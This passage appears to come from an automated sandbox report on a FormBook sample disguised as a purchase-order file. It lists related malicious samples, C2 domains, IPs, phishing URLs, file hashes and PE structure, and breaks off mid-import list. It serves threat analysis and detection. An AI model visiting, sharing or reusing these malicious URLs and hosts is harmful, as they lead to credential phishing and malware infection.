                                                                    LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                    • www.inchey.online/ercr/
                                                                    136.143.186.12jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/m8yb/
                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/1q08/
                                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    x.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/em49/
                                                                    bin.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/em49/
                                                                    PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                    • www.jrksa.info/nq8t/
                                                                    w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                                    • www.novaminds.online/ephb/?xN6PGj=vLmbgoHRNfK6ITOjmiLFGNRbChMUzx7XLdCca8olfY2Nxc16AQQbup47Ltpv+Aaivc7Y&_0DPe6=UHL0NdrXCvl
                                                                    197.189.237.186foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                    • www.patioprojex.africa/x557/
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.patioprojex.africa/iv79/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    www.huyven.xyzz4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.238.246
                                                                    www.ngmr.xyzrHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 54.67.87.110
                                                                    zhs.zohosites.comjeez.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    x.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    bin.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    www.fieldelse.netz4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.141.10.107

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    • 188.114.97.3
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 172.64.41.3
                                                                    z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5Get hashmaliciousUnknownBrowse
                                                                    • 172.67.132.160
                                                                    Uviv7rEtnt.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 172.67.179.207
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 188.114.96.3
                                                                    https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM=Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    z6INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 188.114.96.3
                                                                    https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 188.114.97.3
                                                                    xneeloZAgarm.elfGet hashmaliciousMiraiBrowse
                                                                    • 197.221.56.217
                                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 197.221.56.203
                                                                    pmpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 41.203.15.86
                                                                    jklx86.elfGet hashmaliciousUnknownBrowse
                                                                    • 129.232.189.148
                                                                    mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 41.203.27.60
                                                                    gppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 197.221.56.219
                                                                    nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 41.203.15.90
                                                                    garm7.elfGet hashmaliciousMiraiBrowse
                                                                    • 197.221.56.218
                                                                    x86_64.elfGet hashmaliciousMiraiBrowse
                                                                    • 197.221.56.205
                                                                    na.elfGet hashmaliciousMirai, GafgytBrowse
                                                                    • 156.38.239.160
                                                                    NAMECHEAP-NETUShttp://demettei.comGet hashmaliciousUnknownBrowse
                                                                    • 198.54.117.242
                                                                    https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                    • 199.188.200.231
                                                                    https://kljhgfdertg7h8uihfgdew34e5rtyuhjiolkjhgfd.pages.dev/?zOTAyMn0.o1hC1xYbJolS=test@kghm.com&h0-bOY230w22zEQSk5TiGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.219.248.26
                                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                    • 192.64.119.187
                                                                    7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                    • 68.65.123.56
                                                                    1.zipGet hashmaliciousUnknownBrowse
                                                                    • 198.54.117.242
                                                                    https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20Get hashmaliciousHTMLPhisherBrowse
                                                                    • 198.54.115.49
                                                                    PO 45003516.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.225.218
                                                                    la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                    • 198.187.31.61
                                                                    New orde.exeGet hashmaliciousFormBookBrowse
                                                                    • 198.54.125.199
                                                                    ZOHO-ASUShttps://workdrive.zohoexternal.com/file/d3qaw4673940b54374623b165953068c580b5Get hashmaliciousHTMLPhisherBrowse
                                                                    • 136.143.191.16
                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                    • 165.173.254.237
                                                                    https://www.pumpproducts.com/goulds-lb0735te-centrifugal-booster-pump-3-4-hp-208-230-460-volts-3-phase-1-1-4-npt-suction-1-npt-discharge-18-gpm-max-176-ft-max-head-5-impeller-tefc-stainless-steel-pump-end-casing.htmlGet hashmaliciousUnknownBrowse
                                                                    • 136.143.190.172
                                                                    https://www.google.hn/url?q=//www.google.ee/amp/s/h2f35e7.ubpages.com/bdeda8-f4eb-4ed8-bGet hashmaliciousHTMLPhisherBrowse
                                                                    • 136.143.190.123
                                                                    https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCEGet hashmaliciousUnknownBrowse
                                                                    • 136.143.182.97
                                                                    https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCEGet hashmaliciousUnknownBrowse
                                                                    • 136.143.182.97
                                                                    https://u47624652.ct.sendgrid.net/ls/click?upn=u001.dadsJCAJAl1i2Wyni-2FqIpB7JUgY2pex5g8M-2FhOTGFFHwo5sWgFDjcqy2L0OmonoaOFxcTz7SSB9Zef6mGbvSbZAXZK2FNhcmYdYC1XfrewJRXTzEzFwzmIj8nJoazHaAQVwyvlny49OkXm-2FDzbhWD3cqi52XZmuHNJ5erV06gLBXVvtoQCYY0OMkrHePY-2F9kOmRiOc8fRxBlNxNWWJDbU4O9z5P8IfXhDPiFYyln4kg-3DMEyt_ta3c1LGL-2F0rVfKZ7mVrwN6xsF1Wes8l2L7kiutKf8O1vhXHOMQAk657ifMzrLT5hR0wjO0bDDWiSyPYBMWem2YqbQ4hjbtaf8R6UfuK7GvGuvaOArNf0yRKKyAsKfoVrlXUbmkgYGBk7NXAN8n11wXOM8RDTicUs3dK12Mnhp63jlPtSTpECLklTQMdoXlI5m8IncC-2BD2wJgWDFrBq8JEg-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                    • 204.141.42.123
                                                                    https://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfacGet hashmaliciousHTMLPhisherBrowse
                                                                    • 136.143.182.97
                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    https://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfacGet hashmaliciousHTMLPhisherBrowse
                                                                    • 136.143.182.97

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\1FZhY82B

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\rasdial.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\syphilous

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Purchase_Order_pdf.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287232
                                                                    Entropy (8bit):7.995508300983733
                                                                    Encrypted:true
                                                                    SSDEEP:6144:PQkBOXLRwGy5TBvjEqFJ8LqltNdx5/XOSbdOAZo10lSHUGsishj0CqO+:foRHGhL8gtB5/XOuo+YHUT41/
                                                                    MD5:B9F10BE763961C984F828376CE2A38D6
                                                                    SHA1:DF586382A2B4673AE500AD1AF5059FE80B9F2449
                                                                    SHA-256:C95BF4CFD70EF462D80140CA922976ACCA0E54162F3C28C9E3DD6F3709E39C88
                                                                    SHA-512:5ED5B2F5CF14E391C85553466AE8A80500BBFCC4979771278123BC71B27E64C58B0252A6B9F97E062B9FA192E797915C44135FA91E587FD6E2218CF5C0E06A86
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:|..k.NW5F...Y..}.I2...mM_..7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI.GL9KQ.;F.>.q.M..`.!X4lI7!0G';. 1!";2a*,.59We'9...dc= (1hLEC.GL9ENW5?W>.m/+.{!/..'+._...|6P.J..z!/.+...y.0..?T+m/+.FAHI1GL9..W5.W6C....FAHI1GL9.NU4MW<CP.HTFAHI1GL9.]W5FF7CP/HTFA.I1WL9ELW5@V7CPOLT@AHI1GL9E.S5FT7CPOLTDA..1G\9E^W5FV'CP_LTFAHI!GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7C~;),2AHI..H9E^W5F.3CP_LTFAHI1GL9ENW5fV7#POLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.511573675079194
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                    • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Purchase_Order_pdf.exe
                                                                    File size:1'327'231 bytes
                                                                    MD5:0e51b97a594aa2f1756261a47a695484
                                                                    SHA1:0c2d719650e6a5bab5a3616c357eb20f6bb6cb6d
                                                                    SHA256:03489fbf1f559b8f7e7c6a0dec74826233e3c79ca34bdf06f9617f269b68ff54
                                                                    SHA512:76f6d96ff362f5e222e22d4e1e37e9ed5f02854b23976b07511a63100e71660e14c0ff4a57d85fa61ea67de45e93c0b56c2198addd2890b3f80ebbaaf9634f67
                                                                    SSDEEP:24576:ffmMv6Ckr7Mny5QLqpuW+7ZQcCHdGYRnDVrTWGii:f3v+7/5QLqpbfcehDV1ii
                                                                    TLSH:E455F112F7D680B6DDA33971297BE327DB3576194323C5CB97E02E768E211109B3A362
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                    File Icon

                                                                    Icon Hash:1733312925935517

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x416310
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007FB6FD0BCEFCh
                                                                    jmp 00007FB6FD0B0CCEh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                    mov ecx, dword ptr [ebp+10h]
                                                                    mov edi, dword ptr [ebp+08h]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007FB6FD0B0E5Ah
                                                                    cmp edi, eax
                                                                    jc 00007FB6FD0B0FFAh
                                                                    cmp ecx, 00000100h
                                                                    jc 00007FB6FD0B0E71h
                                                                    cmp dword ptr [004A94E0h], 00000000h
                                                                    je 00007FB6FD0B0E68h
                                                                    push edi
                                                                    push esi
                                                                    and edi, 0Fh
                                                                    and esi, 0Fh
                                                                    cmp edi, esi
                                                                    pop esi
                                                                    pop edi
                                                                    jne 00007FB6FD0B0E5Ah
                                                                    pop esi
                                                                    pop edi
                                                                    pop ebp
                                                                    jmp 00007FB6FD0B12BAh
                                                                    test edi, 00000003h
                                                                    jne 00007FB6FD0B0E67h
                                                                    shr ecx, 02h
                                                                    and edx, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007FB6FD0B0E7Ch
                                                                    rep movsd
                                                                    jmp dword ptr [00416494h+edx*4]
                                                                    nop
                                                                    mov eax, edi
                                                                    mov edx, 00000003h
                                                                    sub ecx, 04h
                                                                    jc 00007FB6FD0B0E5Eh
                                                                    and eax, 03h
                                                                    add ecx, eax
                                                                    jmp dword ptr [004163A8h+eax*4]
                                                                    jmp dword ptr [004164A4h+ecx*4]
                                                                    nop
                                                                    jmp dword ptr [00416428h+ecx*4]
                                                                    nop
                                                                    mov eax, E4004163h
                                                                    arpl word ptr [ecx+00h], ax
                                                                    or byte ptr [ecx+eax*2+00h], ah
                                                                    and edx, ecx
                                                                    mov al, byte ptr [esi]
                                                                    mov byte ptr [edi], al
                                                                    mov al, byte ptr [esi+01h]
                                                                    mov byte ptr [edi+01h], al
                                                                    mov al, byte ptr [esi+02h]
                                                                    shr ecx, 02h
                                                                    mov byte ptr [edi+02h], al
                                                                    add esi, 03h
                                                                    add edi, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007FB6FD0B0E1Eh

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ASM] VS2008 SP1 build 30729
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [C++] VS2008 SP1 build 30729
                                                                    • [ C ] VS2005 build 50727
                                                                    • [IMP] VS2005 build 50727
                                                                    • [ASM] VS2008 build 21022
                                                                    • [RES] VS2008 build 21022
                                                                    • [LNK] VS2008 SP1 build 30729

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                    RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                    RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                    RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                    RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                    RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                    RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                    Imports

                                                                    DLLImport
                                                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, 